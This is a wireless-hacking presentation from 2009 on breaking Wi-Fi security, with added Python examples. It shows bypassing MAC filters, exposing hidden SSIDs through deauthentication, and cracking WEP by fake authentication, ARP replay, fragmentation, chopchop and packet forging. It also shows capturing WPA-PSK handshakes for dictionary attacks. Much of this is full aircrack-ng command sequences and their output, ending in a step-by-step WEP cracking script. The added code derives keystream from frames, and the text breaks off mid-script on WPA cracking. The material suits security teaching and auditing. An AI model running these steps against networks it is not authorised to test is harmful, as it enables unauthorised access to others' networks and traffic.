Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq
Paperwork released on 24/2/2009

Special thanks to:
    Milw0rm | str0ke
    JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
Contents
    Introduction
    Security of Wireless network
    Breaking the Simple Defenses
        Mac Filtering
        Discover Hidden SSID
        Sniffing Information on the Air
    Get closer with cracking tool
        Aircrack-ng suite
        Decrypt packet with airdecap-ng
        Decloak packet with airdecloak-ng
    Owned the WEP Key with Simple Technique (No Injection)
        Capturing method
        Cracking method
    Owned the WEP Key with Advanced Technique (With Inject Method)
        Monitor Mode
        Fake Authentication
        ARP Replay Attack
        Fragmentation Attack
        Korek ChopChop Attack
        Packetforge
        ARP Request Replay with Interactive Attack
        Cracking WEP key
    Conclusion steps for cracking WEP
    Owned the WPA-PSK / WPA2-PSK Key
    Exploiting Enterprise Wireless Connection (WPA-TLS/TTLS/PEAP)
    Exploiting CISCO LEAP
    References & Greetz to
    About Me / Questions
Introduction
    This presentation introduces the practical techniques hackers use to break wireless security.
    You need some basic knowledge of wireless operation (frames, association, encryption modes) to follow it.
Security of Wireless Network
    (diagram) The protection modes covered: WEP, WPA-PSK, WPA2-PSK, WPA-802.1X, WPA2-802.1X. The slide writes "802.11x"; the port-based authentication standard behind WPA-Enterprise is IEEE 802.1X.
Breaking the Simple Defenses

Bypass MAC Filtering
    (cartoon) The AP checks the client's MAC against its allow-list: "Wait wait.. Lemme check with my system first ... Wow! You're LEGIT! You shall pass."
    The filter only ever sees a MAC address, and the MAC of every associated station is visible in the clear in airodump-ng's STATION column, so the hacker simply reuses one of those and is waved through as a legitimate client.
Breaking the Simple Defenses

Discover Hidden SSID
    (cartoon) The hacker asks the hidden network "Ayam Goreng" for its name and gets no answer from the beacons.
Breaking the Simple Defenses

Discover Hidden SSID
    - SSID broadcasting can be disabled in beacon frames ONLY.
    - All other management frames that name a network (probe requests for a specific SSID, probe responses, association and reassociation requests) contain the SSID of the network in the clear.
    So... what I can do is:
    - Forge DISASSOCIATE frames to a station, seeming to come from the ACCESS POINT, so the station tries to reassociate (and sends the SSID).
    - Reboot a client, so it reassociates when it initializes (if you have physical access to the equipment).
    - RF-jam (interfere with) a client so it tries to reassociate (and exposes the SSID).
    - Install a fake Access Point near a client with a weak signal so it tries to roam (probe requests will be sent).
Breaking the Simple Defenses

Discover Hidden SSID
    Deauthenticate one associated station (-0 1 sends a single burst of 64 deauth frames); when it reconnects, its reassociation request carries the SSID and airodump-ng fills in the ESSID column:

         #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0
         21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
         21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
         #airodump-ng wlan0

    The two counters at the end of the aireplay-ng line are the ACKs received from the AP and from the station; "0| 0 ACKs" as above usually means the card is on the wrong channel or out of range of the station, and nothing will reassociate.
    (cartoon) The station reconnects and the hidden SSID "Ayam Goreng" shows up.
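As an added example (not from the deck), the Python script below shows what the slides above describe at the frame level: a beacon whose SSID element is empty or NUL-filled is a cloaked network, while a reassociation request or probe response for the same BSSID carries the name in the clear, which is exactly the bookkeeping airodump-ng does to fill in the ESSID column after the deauth. The frames are constructed inside the script (the BSSID and station MAC are borrowed from the deck's later hexdumps, the ESSID from the cartoon); on a real airodump-ng pcap you would first strip the radiotap header in front of each 802.11 frame.

```python
"""How a 'hidden' SSID leaks: beacons omit it, the other management frames do not.
Added example; frames are constructed below, not captured."""

SSID_ELEMENT_ID = 0

# 802.11 management subtypes handled here, with the length of the fixed fields
# that sit between the 24-byte header and the tagged parameters.
MGMT_FIXED_LEN = {
    0: ("association request", 4),     # capability(2) + listen interval(2)
    2: ("reassociation request", 10),  # capability(2) + listen interval(2) + current AP(6)
    4: ("probe request", 0),
    5: ("probe response", 12),         # timestamp(8) + beacon interval(2) + capability(2)
    8: ("beacon", 12),
}


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ssid_from_mgmt_frame(frame: bytes):
    """Return (subtype name, bssid, ssid) for a management frame, or None if it is not one.
    ssid is None when the SSID element is absent, empty or all NUL bytes: that is what
    'SSID broadcast disabled' looks like on the air."""
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:            # frame type 0 = management
        return None
    subtype = fc >> 4
    if subtype not in MGMT_FIXED_LEN:
        return None
    name, fixed_len = MGMT_FIXED_LEN[subtype]
    bssid = mac(frame[16:22])           # Addr3 is the BSSID in every management frame
    pos = 24 + fixed_len
    while pos + 2 <= len(frame):        # walk the tagged parameters: id(1) len(1) value
        elem_id, elem_len = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + elem_len]
        if elem_id == SSID_ELEMENT_ID:
            hidden = elem_len == 0 or value == b"\x00" * elem_len
            return name, bssid, (None if hidden else value.decode("utf-8", "replace"))
        pos += 2 + elem_len
    return name, bssid, None


def resolve_hidden_ssids(frames):
    """airodump-ng style table: record each BSSID from its beacons and fill in the ESSID
    as soon as any management frame for that BSSID reveals it."""
    networks = {}
    for frame in frames:
        parsed = ssid_from_mgmt_frame(frame)
        if parsed is None:
            continue
        name, bssid, ssid = parsed
        if ssid is not None:
            networks[bssid] = ssid
        elif name == "beacon":
            networks.setdefault(bssid, None)   # cloaked until something better shows up
    return networks


def mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, bssid: bytes,
               fixed: bytes, ssid_elem: bytes) -> bytes:
    """Build a minimal management frame: Frame Control (version 0, type 0, subtype),
    duration, three addresses, sequence control, fixed fields, SSID element, rates element."""
    header = bytes([subtype << 4, 0x00]) + b"\x00\x00" + addr1 + addr2 + bssid + b"\x00\x00"
    rates = bytes([1, 1, 0x82])          # Supported Rates element: 1 Mbit/s (basic rate)
    return header + fixed + ssid_elem + rates


# Constructed scenario: BSSID and station MAC from the deck's hexdumps, ESSID from the cartoon.
AP = bytes.fromhex("001b2f3dcbd6")
STA = bytes.fromhex("002127c00771")
BROADCAST = b"\xff" * 6
ESSID = b"Ayam Goreng"

CLOAKED_BEACON = mgmt_frame(8, BROADCAST, AP, AP, b"\x00" * 12, bytes([0, 0]))
NUL_BEACON = mgmt_frame(8, BROADCAST, AP, AP, b"\x00" * 12,
                        bytes([0, len(ESSID)]) + b"\x00" * len(ESSID))
PROBE_REQ = mgmt_frame(4, BROADCAST, STA, BROADCAST, b"", bytes([0, 0]))   # wildcard probe
REASSOC_REQ = mgmt_frame(2, AP, STA, AP, b"\x00" * 10, bytes([0, len(ESSID)]) + ESSID)
PROBE_RESP = mgmt_frame(5, STA, AP, AP, b"\x00" * 12, bytes([0, len(ESSID)]) + ESSID)


def demo():
    """Two cloaked beacons, then the deauthed station comes back: the reassociation leaks the name."""
    return resolve_hidden_ssids([CLOAKED_BEACON, NUL_BEACON, PROBE_REQ, REASSOC_REQ, PROBE_RESP])


if __name__ == "__main__":
    for bssid, ssid in demo().items():
        print(bssid, ssid if ssid is not None else "<hidden>")
```

The NUL-filled beacon is included because some APs "hide" the SSID by sending the right length of zero bytes instead of an empty element; airodump-ng shows those as `<length: N>` and the parser treats both forms as cloaked.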
Breaking the Simple Defenses

Sniffing Information on the Air
Get Closer with the Cracking Tool

Aircrack-ng suite
    Aircrack-ng suite is a set of tools for auditing wireless networks.
    4 main tools for today:
        Airodump-ng: used for capturing packets
        Aireplay-ng: used for injection
            De-authentication
            Fake authentication
            Interactive packet replay
            ARP replay
            KoreK Chopchop
            Fragment
        Packetforge-ng: used for creating packets
        Aircrack-ng: used for recovering keys
Get Closer with the Cracking Tool

Decrypt packets with airdecap-ng
    airdecap-ng strips the 802.11 encryption from a capture once you hold the key: the WEP key for a WEP network, or the ESSID plus the passphrase (or PMK) for WPA/WPA2.
    For WPA/WPA2 it only succeeds on a capture that also contains the four-way handshake of the client whose traffic you want to read, because the per-session keys are derived from the nonces exchanged in that handshake, not from the PSK alone.
Get Closer with the Cracking Tool

Decloak packets with airdecloak-ng
    Cloaking is a technique meant to disturb the WEP key cracking process.
    The defender injects packets encrypted with random WEP keys into the network; these packets are called "chaff". If the attacker captures them and runs the cracker on the mixed capture, the result is wrong or no key is returned at all.
    The aircrack team developed a tool to deal with this technique, called "airdecloak-ng":

     #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap

    This command returns two files:
        - workshop-01-filtered.cap: the packets from the given BSSID with the chaff removed (this is the file to give aircrack-ng)
        - workshop-01-cloaked.cap: the packets identified as chaff
Get Closer with the Cracking Tool

Aircracking 101
    PTW Attack
        (-z) (aircrack-ng -z capture.cap). Only works for WEP 64/128-bit keys. It needs ARP request/reply packets, so airodump-ng must save full packets (not an IV-only dump); in return it recovers the key from a few tens of thousands of IVs where the older statistical (KoreK) attack needed hundreds of thousands or more.
    Dictionary Attack
        (WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)
    Fudge Attack
        (-f) Once you have 2 million IVs, try the fudge factor "-f 4". Retry, adding 4 to the fudge factor each time; a higher value makes the KoreK attack try more candidate key bytes, slower but with a better chance of success.

    All the while, keep collecting data. Remember the golden rule: "The more IVs the better".
Pwning the WEP key
    (cartoon: WEP versus the hacker)
Owned the WEP Key with Simple Technique (No Injection)
    Let's assume that the network has high traffic, so we don't need any of the injection steps: we only listen and let the legitimate clients supply the IVs.
    Preparation:
        A device which supports monitor mode (the injection capability is only needed for the advanced technique).
    My preparation:
      5 years old laptop: AMD Turion64 1.6GHz, 256MB DDR (still working harmoniously despite...)
      Ubuntu Intrepid Ibex 8.10
      Broadcom chipset running the legacy b43 driver.
Owned the WEP Key with Simple Technique (No Injection)

Capturing Method
    Rough IV counts to collect before cracking (more never hurts):
    64-bit key: 50,000 IV packets
    128-bit key: 150,000 IV packets

#airodump-ng -w workshop rausb0

    -w workshop writes the capture to workshop-01.cap. Without a channel (-c) and --bssid, airodump-ng keeps hopping channels and only catches a fraction of the target's traffic; the conclusion script at the end locks both.
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx

BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
xx:xx:xx:xx:xx:xx   77   94    10905   11054    0  11  54.  WEP  WEP     OPN   Workshop

BSSID              STATION            PWR  Rate   Lost  Packets  Probes
xx:xx:xx:xx:xx:xx  yy:yy:yy:yy:yy:yy   85  54-54     0     7747
------------------------------------------------------------------------------------------
Owned the WEP Key with Simple Technique (No Injection)

Cracking Method

#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of the target access point

The successful cracking result is the following:

 ---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
             KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)
    Let's assume that the network has no traffic at all, so we have to generate the IVs ourselves. The trick is to replay a packet the AP will relay: the AP accepts it, re-encrypts it with a fresh IV and sends it back out, so every replay yields one new IV for the cracker.
    The requirements for the chosen packet are:
        The source MAC address is associated with the access point (we arrange this by fake authentication).
        It is sent from a client to the access point (the "To DS" flag is set to 1).
        The destination MAC address is the broadcast address (FF:FF:FF:FF:FF:FF), so the AP relays it back to the wireless side.
    The well-known packet which meets all requirements is the ARP request broadcast.
    We can divide the injection technique into 2 scenarios:
        The network has ARP requests: capture one and replay it (ARP replay attack).
        The network has no ARP requests: recover keystream with chopchop or the fragmentation attack, forge an ARP request with packetforge-ng, and replay it with the interactive attack.
Owned the WEP Key with Advanced Technique (With Inject Method)

  Monitor mode
      Use airmon-ng to set your wifi card to monitor mode and prepare it for packet injection:
  #airmon-ng start wlan0 11
      This sets wlan0 to monitor mode on channel 11. We must specify the same channel as the target AP, otherwise the injected frames never reach it. With mac80211 drivers airmon-ng creates a separate monitor interface (mon0) and that is the name to use in the following commands; the slides use rausb0 (a legacy rt73usb adapter) and wlan0 interchangeably.
      (cartoon: "Troops. Prepare for assault!" / "Affirmative" / "I choose YOU!")
Owned the WEP Key with Advanced Technique (With Inject Method)

Fake Authentication
    We can do fake authentication with the following command:

 #aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

 -a xx:xx:xx:xx:xx:xx is the MAC address of the access point
 -h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card

    On success our MAC address is associated with the access point, which is what makes the AP accept (and relay) the frames we inject later:
 ------------------------------------------
 00:00:00 Sending Authentication Request
 00:00:00 Authentication successful
 00:00:00 Sending Association Request
 00:00:00 Association successful :-)
 ------------------------------------------

    If the authentication or association step fails, the usual causes are MAC filtering (use the MAC of an associated client for -h, as in "Bypass MAC Filtering") or the card not being on the AP's channel.
    After succeeding in fake authentication, we have to determine what type of network we are facing (ARP traffic or none) and pick the appropriate steps to deal with it.
Owned the WEP Key with Advanced Technique (With Inject Method)

ARP Replay Attack
    We can run the ARP replay attack with the following command:
 #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

 -b xx:xx:xx:xx:xx:xx is the MAC address of the access point
 -h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card

    Aireplay-ng waits for an ARP request from a real client (it recognises one by its length and broadcast destination without decrypting it) and then replays it over and over automatically:
 ------------------------------------------------------------------------------------
 21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
 Saving ARP requests in replay_arp-0223-210620.cap
 You should also start airodump-ng to capture replies.
 Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
 ------------------------------------------------------------------------------------
    The replies relayed by the AP, each with a new IV, are what airodump-ng has to capture; "0 ACKs" means the AP is not acknowledging our frames, so check the fake authentication and the channel before waiting for IVs.
Owned the WEP Key with Advanced Technique (With Inject Method)

Fragmentation Attack
    The fragmentation attack recovers up to 1500 bytes of keystream (PRGA) for one IV, without recovering the key. It starts from the 8 keystream bytes that the predictable LLC/SNAP header at the start of every data frame gives away, sends short fragments encrypted with those bytes that the AP reassembles and relays as one longer frame, and grows the known keystream with each round. With 1500 bytes of keystream we can forge any packet up to 1500 bytes. The command for the fragmentation attack is:
 #aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
Owned the WEP Key with Advanced Technique (With Inject Method)

Fragmentation Attack
    The system responds with this:


 -------------------------------------------------------------------------------
 21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
 21:21:07 Waiting for a data packet...

       Size: 90, FromDS: 1, ToDS: 0 (WEP)

               BSSID      = 00:1B:2F:3D:CB:D6
               Dest. MAC = 00:1A:73:37:E2:A3
               Source MAC = 00:1B:2F:3D:CB:D6

              0x0000:   8842   2c00   001a   7337   e2a3   001b   2f3d   cbd6   .B,...s7..../=..
              0x0010:   001b   2f3d   cbd6   20df   0000   b168   ff00   2872   ../=.. ....h..(r
              0x0020:   7547   d03f   70d7   2d29   1397   7d3d   ac16   382a   uG.?p.-)..}=..8*
              0x0030:   f20f   77fb   ca63   13e0   f7a6   9228   ddc0   8263   ..w..c.....(...c
              0x0040:   5315   a328   87cb   0d4a   b36a   e5be   93c7   307a   S..(...J.j....0z
              0x0050:   7bc2   18d7   2df5   94f2   5aed                        {...-...Z.

 Use this packet ?
 -------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)

Fragmentation Attack
    We just have to answer yes

 -----------------------
 Use this packet ? y
 -----------------------


    And the successful process looks like this:

 ----------------------------------------------------------------------------------
 Saving chosen packet in replay_src-0223-212107.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0223-212107.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
 ----------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)

Korek ChopChop Attack
    We can run the chopchop attack with this command:

 #aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0

    Chopchop decrypts one packet without the key: it chops off the last byte, guesses its plaintext, fixes up the CRC-32 ICV accordingly and sends the shortened frame to the AP; the AP relays it only when the guess was right. One byte per round, from the end of the packet backwards, yields the plaintext and the keystream for that packet's IV.
    Aireplay-ng picks a packet for decrypting; we can choose any packet whose BSSID is our target.
 --------------------------------------------------------------------------------------
 21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11

       Size: 90, FromDS: 1, ToDS: 0 (WEP)

               BSSID      = 00:1B:2F:3D:CB:D6
               Dest. MAC = 00:1A:73:37:E2:A3
               Source MAC = 00:1B:2F:3D:CB:D6

              0x0000:   8842   2c00   001a   7337   e2a3   001b   2f3d   cbd6   .B,...s7..../=..
              0x0010:   001b   2f3d   cbd6   6084   0000   55bc   e600   2e4e   ../=..`...U....N
              0x0020:   a334   a2b3   fc4c   fe8a   2cf4   f548   0f27   90d0   .4...L..,..H.'..
              0x0030:   767d   2725   bedd   62ec   252e   8b4b   d2d3   a8a0   v}'%..b.%..K....
              0x0040:   bb3f   4874   c821   c402   467d   f70f   2a56   43a7   .?Ht.!..F}..*VC.
              0x0050:   b09b   f0f1   8b04   fc1c   0b72                        .........r

 Use this packet ?
  ----------------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)

Korek ChopChop Attack
    Just answer yes


 -----------------------
 Use this packet ? y
 -----------------------

    And then the system will do the decrypting



 ---------------------------------------------------------------------------------------
 Saving chosen packet in replay_src-0223-211242.cap

 Offset   87   ( 3%   done)   |   xor   =   4E   |   pt   =   3C   |   64 frames written in 1097ms
 Offset   86   ( 5%   done)   |   xor   =   16   |   pt   =   1D   |   119 frames written in 2029ms
 Offset   85   ( 7%   done)   |   xor   =   63   |   pt   =   7F   |   146 frames written in 2476ms
 Offset   84   ( 8%   done)   |   xor   =   97   |   pt   =   6B   |   239 frames written in 4068ms
 Offset   83   (10%   done)   |   xor   =   0E   |   pt   =   0A   |   228 frames written in 3865ms
 Offset   82   (12%   done)   |   xor   =   86   |   pt   =   0D   |   273 frames written in 4646ms
 And so   on   ...

 The AP appears to drop packets shorter than 40 bytes.
 Enabling standard workaround: IP header re-creation.

 Saving plaintext in replay_dec-0223-211410.cap
 Saving keystream in replay_dec-0223-211410.xor
 Completed in 21s (2.48 bytes/s)
 ---------------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)

Packetforge
   Creates an encrypted packet from the PRGA (.xor file) obtained with the chopchop or fragmentation attack.
#Packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp

   -0 builds an ARP request; -a is the AP MAC, -h the source MAC (our card); -k and -l are the destination and source IP addresses (255.255.255.255 works on any network because the AP does not look at the IP layer); -y is the keystream file; -w is the output file.

    The result is:

----------------------
Wrote packet to: arp
----------------------

    From this command we get an ARP request packet, encrypted under the IV of the chopchopped packet, in the file named "arp".
Owned the WEP Key with Advanced Technique (With Inject Method)

ARP Request Replay with Interactive Attack
    We use aireplay-ng to inject the forged ARP request packet towards the access point with the following command:
 #aireplay-ng -2 -r arp rausb0

    And...
 -----------------------------------------------------------------------------------

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

                BSSID = 00:1B:2F:3D:CB:D6
            Dest. MAC = FF:FF:FF:FF:FF:FF
           Source MAC = 00:21:27:C0:07:71

        0x0000:   0841   0201   001b   2f3d   cbd6   0021   27c0   0771   .A..../=...!'..q
        0x0010:   ffff   ffff   ffff   8001   55bc   e600   2e4e   a334   ........U....N.4
        0x0020:   a2b3   fc4a   bb8b   24c4   2618   4f26   fdf7   6c3b   ...J..$.&.O&..l;
        0x0030:   ef7a   2a36   5dbb   252c   8c0c   8764   632d   537e   .z*6].%,...dc-S~
        0x0040:   66bf   700e                                             f.p.

 Use this packet ?
 -----------------------------------------------------------------------------------
Owned the WEP Key with Advanced Technique (With Inject Method)

ARP Request Replay with Interactive Attack
    Yes is the only option available

 -----------------------
 Use this packet ? y
 -----------------------

    Now aireplay-ng starts injecting the packets

 -------------------------------------------------------
 Saving chosen packet in replay_src-0223-211755.cap
 You should also start airodump-ng to capture replies.
 Sent 1200 packets...(499 pps)
 -------------------------------------------------------

    And don't forget to start airodump-ng (on the same channel, with -w so the capture is written to disk): the "Sent" counter only shows our injection; what matters is the #Data column in airodump-ng growing with the AP's relayed copies, each of which carries a fresh IV.
Owned the WEP Key with Advanced Technique (With Inject Method)

Cracking WEP Key

#aircrack-ng -z capture1.cap (PTW Attack)

The successful cracking result is the following:

---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
                     KEY FOUND! [ 00:11:22:33:44 ]
      Decrypted correctly: 100%
---------------------------------------------------------------
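The two hexdumps aireplay-ng printed above are enough to see why the injection recipe works. The added Python below (not part of the deck) parses them: it decodes the Frame Control flags and the three addresses the deck's conditions refer to, handles the 2-byte QoS Control field that the chopchop source frame (subtype 8, QoS Data) carries and the forged ARP (subtype 0) does not, and XORs the first ciphertext bytes with the fixed LLC/SNAP header to recover the 8 keystream bytes the fragmentation attack bootstraps from. The only assumption is the EtherType of the AP's frame (IPv4); it is confirmed by the identical keystream falling out of the forged ARP, which packetforge-ng built under the same IV (55:bc:e6). That IV reuse is also why the AP's relayed copies, not our injected frames, are what feed aircrack-ng: each relay gets a fresh IV.

```python
"""Parse the WEP data frames aireplay-ng showed and read off the keystream bytes
the fragmentation attack starts from. Added example, not part of the deck."""
from dataclasses import dataclass

# Hexdumps copied from the deck's aireplay-ng output (ASCII column dropped):
# the QoS data frame chopchop was run on (AP -> station) and the ARP request
# packetforge-ng built from the recovered PRGA (station -> AP).
CHOPCHOP_SOURCE = bytes.fromhex(
    "8842 2c00 001a 7337 e2a3 001b 2f3d cbd6"
    "001b 2f3d cbd6 6084 0000 55bc e600 2e4e"
    "a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0"
    "767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0"
    "bb3f 4874 c821 c402 467d f70f 2a56 43a7"
    "b09b f0f1 8b04 fc1c 0b72"
)
FORGED_ARP = bytes.fromhex(
    "0841 0201 001b 2f3d cbd6 0021 27c0 0771"
    "ffff ffff ffff 8001 55bc e600 2e4e a334"
    "a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b"
    "ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e"
    "66bf 700e"
)
LLC_SNAP = bytes.fromhex("aaaa03000000")   # first 6 plaintext bytes of every 802.11 data payload
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


@dataclass
class WepDataFrame:
    to_ds: bool
    from_ds: bool
    qos: bool
    bssid: str
    src: str
    dst: str
    iv: bytes          # 24-bit WEP IV, sent in the clear
    key_index: int
    ciphertext: bytes  # RC4-encrypted LLC/SNAP header + payload (ICV stripped)
    icv: bytes         # encrypted CRC-32, last 4 bytes of the frame


def parse_wep_data_frame(frame: bytes) -> WepDataFrame:
    fc, flags = frame[0], frame[1]
    if (fc >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    if not flags & 0x40:
        raise ValueError("Protected bit clear: frame is not WEP-encrypted")
    if to_ds and from_ds:
        raise ValueError("WDS frame with four addresses: not handled here")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds:          # station -> AP: Addr1 = BSSID, Addr2 = SA, Addr3 = DA
        bssid, src, dst = a1, a2, a3
    elif from_ds:      # AP -> station: Addr1 = DA, Addr2 = BSSID, Addr3 = SA
        dst, bssid, src = a1, a2, a3
    else:              # ad hoc: Addr1 = DA, Addr2 = SA, Addr3 = BSSID
        dst, src, bssid = a1, a2, a3
    qos = bool((fc >> 4) & 0x8)         # QoS Data subtypes add a 2-byte QoS Control field
    hdr_len = 26 if qos else 24
    iv, key_index = frame[hdr_len:hdr_len + 3], frame[hdr_len + 3] >> 6
    body = frame[hdr_len + 4:]
    return WepDataFrame(to_ds, from_ds, qos, mac(bssid), mac(src), mac(dst),
                        iv, key_index, body[:-4], body[-4:])


def is_replay_candidate(f: WepDataFrame) -> bool:
    """The deck's conditions: sent by a station towards the AP (ToDS=1) and addressed
    to broadcast, so the AP re-encrypts it with a fresh IV and relays it."""
    return f.to_ds and not f.from_ds and f.dst == BROADCAST


def keystream_prefix(f: WepDataFrame, ethertype: int) -> bytes:
    """Known-plaintext start of the fragmentation attack: the payload begins with
    AA AA 03 00 00 00 + EtherType, so XORing the first 8 ciphertext bytes with that
    guess yields 8 bytes of RC4 keystream (PRGA) for this frame's IV."""
    known = LLC_SNAP + ethertype.to_bytes(2, "big")
    return bytes(c ^ p for c, p in zip(f.ciphertext[:8], known))


def demo():
    src = parse_wep_data_frame(CHOPCHOP_SOURCE)   # assumed IPv4 (EtherType 0x0800)
    arp = parse_wep_data_frame(FORGED_ARP)        # ARP request (EtherType 0x0806)
    return {
        "source_is_candidate": is_replay_candidate(src),
        "forged_is_candidate": is_replay_candidate(arp),
        "same_iv": src.iv == arp.iv,
        "prga_from_source": keystream_prefix(src, 0x0800).hex(),
        "prga_from_forged": keystream_prefix(arp, 0x0806).hex(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The same 8 keystream bytes come out of both frames although one is IP and the other ARP: only the EtherType byte differs, and it differs by the same XOR in plaintext and ciphertext. That equality is the check to run when an EtherType guess is in doubt.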
Conclusion Scripts for Cracking WEP

    $AP is the Access Point MAC address
    $WIFI is the WiFi card MAC address

airmon-ng start wlan0 11 (monitor mode must be started on the AP's channel; on mac80211 drivers use the mon0 interface it creates in the commands below)

airodump-ng -c 11 --bssid $AP -w capture1 wlan0 (-w takes a prefix; the capture is written to capture1-01.cap)

aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 (replace linksys with the target ESSID)

aireplay-ng -4 -b $AP -h $WIFI wlan0
           If it's not working, try #aireplay-ng -5 -b $AP -h $WIFI wlan0

packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y replay.xor -w arp (replay.xor stands for the .xor file the previous step wrote: replay_dec-*.xor from chopchop, fragment-*.xor from the fragmentation attack)

aireplay-ng -2 -r arp wlan0

aircrack-ng -z capture1-01.cap (run it while the replay is still going; it restarts every 5000 new IVs)
Owned the WPA-PSK/WPA2-PSK Key
    The idea for cracking a pre-shared key is to capture the four-way handshake and run a dictionary attack against it offline. Each candidate passphrase is stretched with PBKDF2 (4096 rounds of HMAC-SHA1, salted with the SSID) into the PMK; the PMK, the two MAC addresses and the two handshake nonces give the PTK; and the first 16 bytes of the PTK are used to recompute the MIC on the handshake. A match means the candidate is the key. Unlike WEP, no amount of extra traffic helps: if the passphrase is not in the wordlist the attack fails.
Owned the WPA-PSK/WPA2-PSK Key
    We can force a handshake by de-authenticating an associated client.
    This makes the client re-authenticate, and we capture the four-way handshake from that process (airodump-ng must already be running on the channel with -w, so the handshake lands in the capture file).
    The command for de-authentication is:

#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
Owned the WPA-PSK/WPA2-PSK Key
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

Opening workshop-02.cap
Read 252 packets.

    #     BSSID                 ESSID        Encryption
    1     xx:xx:xx:xx:xx:xx     Workshop     WPA (1 handshake)

Choosing first network as target.

Opening workshop-02.cap
Reading packets, please wait...

                           Aircrack-ng 1.0 rc1 r1085

                  [00:00:00] 0 keys tested (0.00 k/s)

                         KEY FOUND! [ TheFuckinWPAKey ]

    Master Key        : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19
                        19 B5 F2 80 BE 81 15 10 63

   Transient Key  : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48
                    37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F
                    AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

   EAPOL HMAC         : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
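The three values aircrack-ng prints are the intermediate results of the attack: "Master Key" is the PMK derived from the candidate passphrase and the SSID, "Transient Key" is the PTK derived from the PMK, the two MACs and the two nonces, and "EAPOL HMAC" is the MIC recomputed with the first 16 bytes of the PTK and compared against the one in the captured handshake. The added Python below (not from the deck) implements that chain and runs it against a wordlist. The handshake is constructed inside the script from a passphrase the script chooses (the deck's key is not reproduced), with the BSSID and station MAC taken from the deck's hexdumps and constructed nonces; against a real capture you would feed it the ANonce from message 1 or 3, the SNonce and the full EAPOL frame of message 2, the ESSID and the two MACs.

```python
"""Dictionary attack on a WPA/WPA2-PSK four-way handshake: the computation behind
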